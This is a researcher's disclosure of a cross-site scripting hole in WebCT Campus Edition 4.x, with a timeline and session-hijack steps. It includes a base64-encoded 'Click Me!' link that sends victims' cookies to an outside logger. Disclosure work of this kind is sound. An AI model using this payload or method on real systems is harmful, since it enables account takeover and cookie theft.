- Software: WebCT Campus Edition 4.x (http://secunia.com/product/3280/)
- Affected Version: 188.8.131.52
- Discoverer: Benjamin "balupton" Lupton
- Date Discovered: November 2005
- Date Reported: 2006-06-25
- Software Author Contacted (again) on: 2007-07-20
- Date Published: 2008-03-05
- Revisions: https://gist.github.com/balupton/3cb9a0e066ebb899d2be/revisions
Contacted TAFE lecturers and administrators, who didn't really care. Contacted WestOne multiple times, but never recieved any response. Then contacted Secunia, which would not publish as the discoverer did not own their own copy of the software in question. Published as WebCT is being phased out, with Blackboard being the replacement.
- The attacker publishes the exploit code in a message with "Don't wrap text" enabled.
- The victim accesses the attacker's message and their cookies are sent to the attacker's remote logger.
- The attacker then logs into the system and replaces his/her cookies with the acquired cookies. Cookies are formatted as follows within the "value" attribute:
- The attacker is now logged into the system as the victim. In this case the logger is located here:
- Victims must be students (attack does not work on non students, eg. teachers/admins).
- Attack 2 will also run in Opera, but fails to retrieve the document.cookie value.
- Attack Code: See below
- Base64 Decoder / Encoder:
- Cookie Editor: Firefox - http://editcookies.mozdev.org/ , Opera - Built In
Attack 1 - IE6SP2 Exploit (Automatic)
Attack 2 - Firefox Exploit (Manual)
<a href="data:text/html;base64,PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KLy8gYmFsdXB0b24ncyBqYXZhc2NyaXB0IHNlc3Npb24gc3RlYWxlciBtYW51YWwgaGFjaw0KdmFyIHVybCA9DQoJJ2h0dHA6Ly93d3cuYmFsdXB0b24uY29tL3NhbmRib3gvbG9nZ2VyLnBocCcNCgkrJz92YXJpYWJsZT1kb2N1bWVudC5jb29raWUnDQoJKycmdmFsdWU9Jytlc2NhcGUoZG9jdW1lbnQuY29va2llKQ0KCSsnJnVybD0nK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlciA/IGRvY3VtZW50LnJlZmVycmVyIDogJ2h0dHA6Ly9leHBsb2l0ZWRfdXJsLmNvbScpDQoJKycmcGFzc19jb2RlPXNlY3JldF9rZXknDQoJOw0KZG9jdW1lbnQubG9jYXRpb24gPSB1cmw7DQo8L3NjcmlwdD4=">Click Me!</a>
Attack 2 - Firefox Exploit (Manual) - Decoded